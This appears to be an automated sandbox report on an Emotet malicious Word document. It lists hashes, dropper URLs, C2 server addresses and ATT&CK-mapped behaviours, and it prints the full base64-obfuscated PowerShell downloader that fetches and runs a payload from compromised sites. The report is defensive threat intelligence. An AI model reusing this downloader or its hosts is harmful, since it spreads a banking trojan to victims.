emotet | 21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac

General

Target

emotet_e2_21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac_2020-10-28__174250968356._doc.doc
Size

218KB
MD5

8d7f667c5911d8e6c24bcbdbfe56b497
SHA1

e13f9c603441f701c0ca9a53bb9b69eb5cb071a9
SHA256

21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac
SHA512

cc60e5138a4f1ff38329f30507a2840550758ca1bc0469f9c347ed735eb55b9af8ae69eb0dd646d4a22189e38812a6b386d66c7df3a25d3d770297556993b9e0

Score

10^/10

emotet epoch2 banker trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://www.saintmarcel.com/wp-includes/VKbL2/

exe.dropper

https://gayatrienterprise.org/wp-admin/DPBsj/

exe.dropper

https://weparditestaa.fi/wp-admin/72uPk/

exe.dropper

https://blog.6b47.com/Assets/w5U/

exe.dropper

https://www.easeiseasy.com/wp-admin/q/

exe.dropper

https://ursuperstar.com/wp-admin/AAxKlbV/

exe.dropper

https://kramedas.lt/wp-admin/E9Gciyc/

exe.dropper

https://critical-thinking.fr/wp-includes/vHQWren/

Extracted

Family

emotet

Botnet

Epoch2

C2

80.227.52.78:80

51.89.199.141:8080

173.212.214.235:7080

167.114.153.111:8080

61.19.246.238:443

37.179.204.33:80

190.164.104.62:80

95.9.5.93:80

138.68.87.218:443

176.111.60.55:8080

194.190.67.75:80

66.76.12.94:8080

190.29.166.0:80

139.59.60.244:8080

184.180.181.202:80

49.50.209.131:80

24.133.106.23:80

121.7.31.214:80

185.94.252.104:443

50.91.114.38:80

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POwersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4188	2992	POwersheLL.exe

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral2/memory/8-12-0x0000000002210000-0x0000000002253000-memory.dmp	emotet
behavioral2/memory/8-13-0x00000000026C0000-0x0000000002702000-memory.dmp	emotet
behavioral2/memory/400-16-0x0000000002060000-0x00000000020A3000-memory.dmp	emotet
behavioral2/memory/400-17-0x00000000021E0000-0x0000000002222000-memory.dmp	emotet

Blacklisted process makes network request 2 IoCs

Processes:

POwersheLL.exe

flow pid process

15 4188 POwersheLL.exe
19 4188 POwersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

R1s2f0emk.exetbs.exe

pid process

8 R1s2f0emk.exe
400 tbs.exe
Drops file in System32 directory 1 IoCs

Processes:

R1s2f0emk.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\msdelta\tbs.exe R1s2f0emk.exe

flow	pid	process
15	4188	POwersheLL.exe
19	4188	POwersheLL.exe

pid	process
8	R1s2f0emk.exe
400	tbs.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\msdelta\tbs.exe	R1s2f0emk.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey svchost.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4760 WINWORD.EXE
4760 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

POwersheLL.exetbs.exe

pid process

4188 POwersheLL.exe
4188 POwersheLL.exe
4188 POwersheLL.exe
400 tbs.exe
400 tbs.exe
400 tbs.exe
400 tbs.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

POwersheLL.exe

description pid process

Token: SeDebugPrivilege 4188 POwersheLL.exe
Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

WINWORD.EXER1s2f0emk.exetbs.exe

pid process

4760 WINWORD.EXE
4760 WINWORD.EXE
4760 WINWORD.EXE
4760 WINWORD.EXE
4760 WINWORD.EXE
4760 WINWORD.EXE
4760 WINWORD.EXE
8 R1s2f0emk.exe
400 tbs.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey	svchost.exe

pid	process
4760	WINWORD.EXE
4760	WINWORD.EXE

pid	process
4188	POwersheLL.exe
4188	POwersheLL.exe
4188	POwersheLL.exe
400	tbs.exe
400	tbs.exe
400	tbs.exe
400	tbs.exe

description	pid	process
Token: SeDebugPrivilege	4188	POwersheLL.exe

pid	process
4760	WINWORD.EXE
4760	WINWORD.EXE
4760	WINWORD.EXE
4760	WINWORD.EXE
4760	WINWORD.EXE
4760	WINWORD.EXE
4760	WINWORD.EXE
8	R1s2f0emk.exe
400	tbs.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

R1s2f0emk.exe

description	pid	process	target process
PID 8 wrote to memory of 400	8	R1s2f0emk.exe	tbs.exe
PID 8 wrote to memory of 400	8	R1s2f0emk.exe	tbs.exe
PID 8 wrote to memory of 400	8	R1s2f0emk.exe	tbs.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac_2020-10-28__174250968356._doc.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4760

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD UwBlAHQALQBJAFQARQBNACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBQAFYASgBVACAAIAAoACAAIABbAHQAWQBQAEUAXQAoACIAewAzAH0AewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcARQBNAC4AJwAsACcAaQBvAC4ARABpAHIAZQAnACwAJwBjAFQAbwByAFkAJwAsACcAUwB5AHMAVAAnACkAKQAgADsAIAAgACQARABUAE4AbQByAD0AIAAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADIAfQB7ADEAfQB7ADUAfQAiACAALQBGACcAcwB5AHMAdABlAE0ALgBuAEUAdAAuAFMAZQBSAHYASQBjAGUAJwAsACcAYQBuACcALAAnAFQAbQAnACwAJwBwACcALAAnAG8ASQBuACcALAAnAGEARwBlAFIAJwApACAAOwAgACQAVgB3ADYAMQB2AHAAdQA9ACgAJwBCACcAKwAoACcAMgAnACsAJwBoAHcAOQAnACkAKwAnADIAeAAnACkAOwAkAEUAagAyAHAAMQA1ADIAPQAkAEEAMwBhAHMANwBxAGEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFIAZAA5AGwAdgB4AG8AOwAkAE8AdQB2AGQAXwBhAG0APQAoACcAVwAnACsAKAAnAGUAMQAnACsAJwBfACcAKQArACgAJwAzACcAKwAnADMAcAAnACkAKQA7ACAAKAAgAGcASQAgACAAVgBhAFIASQBhAGIATABlADoAcAB2AGoAdQAgACkALgBWAEEAbAB1AGUAOgA6ACIAQwBgAFIARQBBAHQAZQBkAGAASQByAGAARQBDAHQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnADcAJwArACcAbwBQAFEAJwApACsAKAAnAHEANQA0ACcAKwAnADEAMAAnACsAJwBvADcAbwBQAFkAcQAnACkAKwAnAHIAdAAnACsAKAAnAGgAdAAxACcAKwAnADcAbwAnACkAKwAnAFAAJwApACAAIAAtAEMAcgBFAFAATABBAGMAZQAoAFsAQwBIAEEAUgBdADUANQArAFsAQwBIAEEAUgBdADEAMQAxACsAWwBDAEgAQQBSAF0AOAAwACkALABbAEMASABBAFIAXQA5ADIAKQApADsAJABVADUAcwBxAHQAaABrAD0AKAAoACcAUAAnACsAJwBlAGMAJwApACsAKAAnAHMAcgBqACcAKwAnAGUAJwApACkAOwAgACgAIAAgAEcAZQB0AC0AVgBhAHIASQBhAGIATABlACAARAB0AG4ATQBSACkALgB2AEEATABVAEUAOgA6ACIAcwBlAEMAdQByAGAASQBUAGAAeQBQAFIATwB0AG8AQwBPAGwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAnACkAKwAnADEAMgAnACkAOwAkAEkAdgBjAG4AZgB1AHoAPQAoACcATAAzACcAKwAnAHgAMwAnACsAKAAnADIAJwArACcAYQAwACcAKQApADsAJABNADMAegB5ADkAMQBqACAAPQAgACgAJwBSADEAJwArACgAJwBzACcAKwAnADIAZgAnACkAKwAnADAAJwArACgAJwBlAG0AJwArACcAawAnACkAKQA7ACQATQA2ADkANgAzAHgAYQA9ACgAKAAnAFEAJwArACcAZwAxACcAKQArACgAJwBiAGQAJwArACcAagAnACkAKwAnAGYAJwApADsAJABaADIAdgB0AHgAdgBnAD0AKAAoACcAVgAyADIAJwArACcAbgAnACkAKwAnAGsAbgAnACsAJwByACcAKQA7ACQAVABqAG0AbwA3AHkAZgA9ACQASABPAE0ARQArACgAKAAoACcAUgAnACsAJwBsAGUAJwArACcAUQBxADUAJwApACsAKAAnADQAMQAnACsAJwAwACcAKQArACcAbwBSACcAKwAnAGwAZQAnACsAKAAnAFkAcQAnACsAJwByAHQAJwApACsAKAAnAGgAdAAxAFIAJwArACcAbAAnACkAKwAnAGUAJwApAC4AIgBSAEUAUABgAEwAYABBAEMAZQAiACgAKAAnAFIAJwArACcAbABlACcAKQAsAFsAUwBUAHIASQBuAGcAXQBbAEMAaABhAHIAXQA5ADIAKQApACsAJABNADMAegB5ADkAMQBqACsAKAAnAC4AJwArACgAJwBlAHgAJwArACcAZQAnACkAKQA7ACQAQwA4AGMANgBkAHcAYQA9ACgAJwBUACcAKwAoACcAcQAnACsAJwBuADMAJwApACsAKAAnAGcAJwArACcAeAB4ACcAKQApADsAJABYADAAMgB2AGIAYwBuAD0ALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABOAEUAdAAuAHcAZQBCAEMATABpAEUATgBUADsAJABBAGQANAAwAGwAOABoAD0AKAAoACgAKAAnAGgAdAB0AHAAcwAnACsAJwA6AF0AWwAgADEAKQAnACsAJwAgACcAKwAnAGoAagBrAGcAJwArACcAUwAgAFsAXQAgACcAKwAnAFsAXQB3ACcAKwAnAF0AWwAgADEAKQAgAGoAagBrAGcAUwAnACsAJwAgAFsAJwArACcAXQAgACcAKwAnAFsAXQB3AHcAdwB3ACcAKwAnAC4AcwBhAGkAbgAnACkAKQArACgAKAAnAHQAbQBhAHIAYwAnACsAJwBlAGwAJwArACcALgBjAG8AbQAnACsAJwBdAFsAIAAnACsAJwAxACcAKwAnACkAIAAnACsAJwBqACcAKwAnAGoAJwArACcAawBnAFMAIAAnACsAJwBbAF0AIABbAF0AdwB3AHAALQAnACsAJwBpAG4AYwBsAHUAZABlAHMAXQBbACAAMQApACAAJwArACcAagBqAGsAZwBTACAAWwBdACAAWwBdACcAKwAnAHcAJwArACcAVgBLAGIATAAyAF0AWwAgADEAKQAgAGoAagBrAGcAJwArACcAUwAgAFsAJwApACkAKwAoACgAJwBdACAAJwArACcAWwBdACcAKwAnAHcAQABoAHQAJwArACcAdABwAHMAJwArACcAOgBdAFsAJwArACcAIAAxACcAKwAnACkAJwArACcAIABqAGoAJwArACcAawBnAFMAIABbAF0AJwArACcAIABbACcAKwAnAF0AdwBdAFsAJwArACcAIAAxACcAKwAnACkAIABqAGoAawBnAFMAIABbAF0AIAAnACsAJwBbAF0AJwArACcAdwBnAGEAeQBhAHQAcgBpAGUAbgB0AGUAcgBwAHIAJwApACkAKwAoACgAJwBpAHMAZQAuAG8AJwArACcAcgBnAF0AWwAgADEAKQAgAGoAJwArACcAagAnACsAJwBrACcAKQApACsAKAAoACcAZwBTACAAJwArACcAWwAnACsAJwBdACAAWwAnACsAJwBdAHcAdwBwACcAKwAnAC0AYQBkAG0AaQBuAF0AWwAgADEAKQAgACcAKwAnAGoAagBrAGcAUwAgACcAKwAnAFsAXQAgAFsAXQB3AEQAUABCAHMAJwArACcAagBdAFsAIAAxACkAIABqAGoAJwArACcAawBnAFMAJwApACkAKwAoACcAIABbAF0AIAAnACsAJwBbAF0AdwAnACsAJwBAAGgAdAAnACkAKwAoACgAJwB0AHAAcwAnACsAJwA6ACcAKwAnAF0AWwAnACsAJwAgACcAKwAnADEAKQAgAGoAagBrAGcAJwArACcAUwAgAFsAXQAgAFsAXQAnACsAJwB3AF0AWwAnACsAJwAgACcAKQApACsAKAAoACcAMQApACAAJwArACcAagBqAGsAJwArACcAZwAnACsAJwBTACcAKwAnACAAJwArACcAWwBdACcAKwAnACAAWwBdAHcAdwBlAHAAJwArACcAYQAnACsAJwByAGQAJwArACcAaQB0AGUAJwArACcAcwAnACsAJwB0AGEAYQAuAGYAaQBdAFsAIAAxACcAKwAnACkAIAAnACsAJwBqAGoAawBnAFMAIABbAF0AJwArACcAIABbAF0AdwAnACkAKQArACgAKAAnAHcAJwArACcAcAAtACcAKwAnAGEAJwArACcAZABtAGkAbgAnACsAJwBdACcAKwAnAFsAIAAnACsAJwAxACcAKwAnACkAIABqAGoAJwArACcAawBnAFMAIABbAF0AIABbAF0AdwA3ADIAdQAnACkAKQArACgAKAAnAFAAawBdAFsAIAAxACcAKwAnACkAJwArACcAIAAnACsAJwBqAGoAawBnAFMAJwArACcAIABbACcAKwAnAF0AIAAnACsAJwBbAF0AdwBAACcAKwAnAGgAdAB0AHAAcwAnACsAJwA6AF0AJwArACcAWwAgADEAKQAgACcAKwAnAGoAJwApACkAKwAoACcAagAnACsAJwBrAGcAUwAgACcAKQArACgAKAAnAFsAJwArACcAXQAgACcAKwAnAFsAXQB3ACcAKwAnAF0AWwAgADEAKQAnACsAJwAgAGoAagAnACsAJwBrACcAKwAnAGcAJwArACcAUwAnACsAJwAgAFsAXQAgAFsAXQB3AGIAbABvACcAKwAnAGcALgA2AGIANAA3ACcAKwAnAC4AYwBvAG0AXQBbACAAJwArACcAMQApACcAKQApACsAKAAnACAAagBqAGsAJwArACcAZwBTACAAJwArACcAWwBdACAAWwAnACsAJwBdAHcAQQBzAHMAZQB0AHMAXQBbACcAKQArACgAKAAnACAAMQApACAAJwArACcAagBqACcAKwAnAGsAJwArACcAZwAnACsAJwBTACAAWwBdACAAWwBdAHcAdwA1AFUAXQBbACcAKwAnACAAMQAnACsAJwApACAAagBqAGsAJwArACcAZwAnACsAJwBTACcAKwAnACAAWwAnACsAJwBdACcAKQApACsAKAAnACAAJwArACcAWwBdAHcAQAAnACkAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAoACgAJwBzACcAKwAnADoAXQAnACsAJwBbACAAMQApACAAagBqACcAKwAnAGsAZwBTACAAWwBdACAAJwArACcAWwBdAHcAXQBbACAAMQApACAAJwArACcAagBqACcAKwAnAGsAZwBTACAAJwArACcAWwBdACcAKwAnACAAWwBdAHcAJwArACcAdwB3AHcALgBlAGEAcwBlAGkAcwBlACcAKQApACsAKAAoACcAYQAnACsAJwBzAHkAJwArACcALgBjAG8AbQBdAFsAIAAxACkAIABqAGoAawBnACcAKwAnAFMAIAAnACsAJwBbACcAKwAnAF0AJwArACcAIABbACcAKwAnAF0AdwB3ACcAKwAnAHAAJwApACkAKwAoACgAJwAtAGEAZABtAGkAbgBdAFsAIAAxACkAIABqAGoAJwArACcAawBnAFMAIAAnACsAJwBbAF0AIABbAF0AdwBxAF0AJwArACcAWwAnACsAJwAgACcAKwAnADEAKQAgACcAKwAnAGoAJwArACcAagAnACsAJwBrAGcAJwArACcAUwAnACsAJwAgACcAKwAnAFsAXQAgACcAKwAnAFsAXQB3AEAAJwArACcAaAB0ACcAKwAnAHQAJwArACcAcABzACcAKwAnADoAJwArACcAXQBbACAAMQApACcAKwAnACAAJwArACcAagAnACsAJwBqAGsAZwBTACAAJwArACcAWwBdACAAWwBdAHcAXQBbACAAMQAnACsAJwApACAAagBqAGsAZwBTACAAWwBdACcAKwAnACAAWwBdAHcAJwArACcAdQByACcAKwAnAHMAdQBwAGUAcgBzACcAKwAnAHQAYQByAC4AJwArACcAYwAnACkAKQArACgAKAAnAG8AbQBdAFsAJwArACcAIAAxACkAIAAnACsAJwBqAGoAawAnACkAKQArACgAJwBnACcAKwAnAFMAIABbAF0AIABbAF0AdwAnACkAKwAoACgAJwB3AHAALQBhACcAKwAnAGQAbQAnACsAJwBpAG4AXQBbACAAMQApACAAagAnACsAJwBqACcAKwAnAGsAZwAnACsAJwBTACcAKwAnACAAJwArACcAWwBdACAAWwBdACcAKwAnAHcAQQBBAHgAJwArACcASwBsAGIAVgBdAFsAJwArACcAIAAxACcAKwAnACkAIABqAGoAJwArACcAawAnACsAJwBnAFMAIAAnACsAJwBbAF0AIAAnACsAJwBbAF0AdwBAAGgAJwArACcAdAB0AHAAcwA6AF0AWwAgADEAJwArACcAKQAnACsAJwAgAGoAagBrAGcAUwAgACcAKQApACsAKAAoACcAWwAnACsAJwBdACAAWwBdAHcAXQBbACAAMQApACAAagBqAGsAZwAnACsAJwBTACcAKwAnACAAWwBdACcAKwAnACAAWwBdACcAKQApACsAKAAoACcAdwBrAHIAYQBtACcAKwAnAGUAZABhAHMALgBsAHQAXQBbACAAMQAnACsAJwApACAAagBqAGsAZwBTACAAJwArACcAWwAnACsAJwBdACAAJwArACcAWwBdAHcAdwBwAC0AJwApACkAKwAoACgAJwBhAGQAbQBpAG4AXQBbACcAKwAnACAAMQApACAAagAnACsAJwBqAGsAZwBTACAAWwBdACAAWwBdACcAKwAnAHcARQAnACsAJwA5ACcAKwAnAEcAYwAnACsAJwBpAHkAYwBdAFsAIAAxACkAIABqAGoAawAnACsAJwBnACcAKwAnAFMAIABbAF0AIABbAF0AdwBAAGgAdAB0AHAAcwA6AF0AWwAgADEAKQAnACsAJwAgAGoAagAnACsAJwBrACcAKwAnAGcAUwAgACcAKwAnAFsAXQAgAFsAJwArACcAXQB3AF0AJwArACcAWwAgADEAKQAgACcAKwAnAGoAJwArACcAagBrACcAKwAnAGcAUwAgAFsAXQAgAFsAXQB3ACcAKwAnAGMAcgBpACcAKQApACsAKAAnAHQAaQBjAGEAbAAtAHQAaAAnACsAJwBpAG4AawBpACcAKwAnAG4AJwArACcAZwAuACcAKQArACgAKAAnAGYAJwArACcAcgAnACsAJwBdAFsAIAAxACkAIABqAGoAawBnACcAKwAnAFMAIABbAF0AIAAnACsAJwBbAF0AdwAnACsAJwB3ACcAKwAnAHAALQAnACkAKQArACcAaQAnACsAKAAoACcAbgBjAGwAdQBkAGUAcwBdAFsAIAAnACsAJwAxACkAJwArACcAIAAnACkAKQArACgAJwBqAGoAJwArACcAawBnACcAKwAnAFMAJwArACcAIABbAF0AIABbAF0AdwAnACkAKwAoACgAJwB2AEgAJwArACcAUQAnACsAJwBXAHIAZQBuAF0AWwAgADEAKQAgAGoAagBrAGcAUwAgACcAKwAnAFsAJwArACcAXQAgAFsAXQB3ACcAKQApACkAKQAuACIAUgBFAGAAUABMAEEAYABDAGUAIgAoACgAKAAoACcAXQBbACAAJwArACcAMQAnACkAKwAoACgAJwApACAAJwApACkAKwAoACcAagBqAGsAJwArACcAZwBTACcAKwAnACAAWwBdACAAWwAnACsAJwBdACcAKQArACcAdwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAeAAnACsAJwB3AGUAJwApACkAWwAwAF0AKQAuACIAUwBgAHAAbABJAHQAIgAoACQAUAB5ADAAbgAzADMAdgAgACsAIAAkAEUAagAyAHAAMQA1ADIAIAArACAAJABSADIAYgBhADcAeABhACkAOwAkAFMAXwA5AGcAaABsAG4APQAoACgAJwBUACcAKwAnAHYAMgBoACcAKQArACcAaAAnACsAJwBvAGEAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGMAbgB1ADMAYQBsACAAaQBuACAAJABBAGQANAAwAGwAOABoACkAewB0AHIAeQB7ACQAWAAwADIAdgBiAGMAbgAuACIARABPAHcAbgBMAE8AYQBEAGAARgBgAGkAbABlACIAKAAkAFgAYwBuAHUAMwBhAGwALAAgACQAVABqAG0AbwA3AHkAZgApADsAJABDAHMAMgB4AG8AZQAwAD0AKAAoACcASQBmAGYAbgAnACsAJwB1ACcAKQArACcAXwBkACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABUAGoAbQBvADcAeQBmACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADIANAA0ADMAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAKAAnAHcAaQAnACsAJwBuADMAJwApACsAKAAnADIAJwArACcAXwBQACcAKQArACcAcgBvACcAKwAoACcAYwBlACcAKwAnAHMAcwAnACkAKQApAC4AIgBjAFIAZQBhAGAAVABFACIAKAAkAFQAagBtAG8ANwB5AGYAKQA7ACQAQwBjAGcAegByAGIAbAA9ACgAKAAnAE8AJwArACcAdwBnAGEAbwAxACcAKQArACcAawAnACkAOwBiAHIAZQBhAGsAOwAkAFYAOQBvADcAbwA3AHcAPQAoACgAJwBQADYAJwArACcAYwBmAGEAJwApACsAJwA1ADMAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABRADMAZQBsADYAcwB4AD0AKAAnAEwAbQAnACsAJwA1AHMAJwArACgAJwAzACcAKwAnAG0AOQAnACkAKQA=
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4188

C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:8

C:\Windows\SysWOW64\msdelta\tbs.exe
"C:\Windows\SysWOW64\msdelta\tbs.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:400

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc
1⤵
PID:4556

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
1⤵
PID:4492

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc
1⤵
- Modifies data under HKEY_USERS
PID:4600

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
MD5
d9bc1ac9b23207e86f6a39dec105bfdb

SHA1
6909596a8164bbb718010fdf7b8cb3fbe502b0ef

SHA256
742df97bbe76b0eb341c3c9fa39d1439758bafda980d1e2bcc94a7f5ce9eb829

SHA512
0311974bed9754675bd8f19ab628a2b55210dad0f49b47871b1baea11dcdfa975ee3874bae99b47a2a8321a04d9b407b1a15442de38a29deaae5d8dd6125d710

Download Submit
C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
MD5
d9bc1ac9b23207e86f6a39dec105bfdb

SHA1
6909596a8164bbb718010fdf7b8cb3fbe502b0ef

SHA256
742df97bbe76b0eb341c3c9fa39d1439758bafda980d1e2bcc94a7f5ce9eb829

SHA512
0311974bed9754675bd8f19ab628a2b55210dad0f49b47871b1baea11dcdfa975ee3874bae99b47a2a8321a04d9b407b1a15442de38a29deaae5d8dd6125d710

Download Submit
C:\Windows\SysWOW64\msdelta\tbs.exe
MD5
d9bc1ac9b23207e86f6a39dec105bfdb

SHA1
6909596a8164bbb718010fdf7b8cb3fbe502b0ef

SHA256
742df97bbe76b0eb341c3c9fa39d1439758bafda980d1e2bcc94a7f5ce9eb829

SHA512
0311974bed9754675bd8f19ab628a2b55210dad0f49b47871b1baea11dcdfa975ee3874bae99b47a2a8321a04d9b407b1a15442de38a29deaae5d8dd6125d710

Download Submit
memory/8-13-0x00000000026C0000-0x0000000002702000-memory.dmp

Filesize
264KB

Download
memory/8-12-0x0000000002210000-0x0000000002253000-memory.dmp

Filesize
268KB

Download
memory/400-17-0x00000000021E0000-0x0000000002222000-memory.dmp

Filesize
264KB

Download
memory/400-16-0x0000000002060000-0x00000000020A3000-memory.dmp

Filesize
268KB

Download
memory/400-14-0x0000000000000000-mapping.dmp

Download
memory/4188-8-0x00000153F4520000-0x00000153F4521000-memory.dmp

Filesize
4KB

Download
memory/4188-9-0x00000153F4A30000-0x00000153F4A31000-memory.dmp

Filesize
4KB

Download
memory/4188-7-0x00007FFE87170000-0x00007FFE87B5C000-memory.dmp

Filesize
9.9MB

Download
memory/4760-0-0x00007FFE8E7D0000-0x00007FFE8EE07000-memory.dmp

Filesize
6.2MB

Download
memory/4760-6-0x0000021AA4CA1000-0x0000021AA4CB2000-memory.dmp

Filesize
68KB

Download
memory/4760-3-0x0000021AA4CA1000-0x0000021AA4CB2000-memory.dmp

Filesize
68KB

Download
memory/4760-5-0x0000021AA4CA1000-0x0000021AA4CB2000-memory.dmp

Filesize
68KB

Download
memory/4760-4-0x0000021AA4CA1000-0x0000021AA4CB2000-memory.dmp

Filesize
68KB

Download
memory/4760-2-0x0000021AA4ABF000-0x0000021AA4ADE000-memory.dmp

Filesize
124KB

Download
memory/4760-1-0x0000021AA4ABF000-0x0000021AA4ADE000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads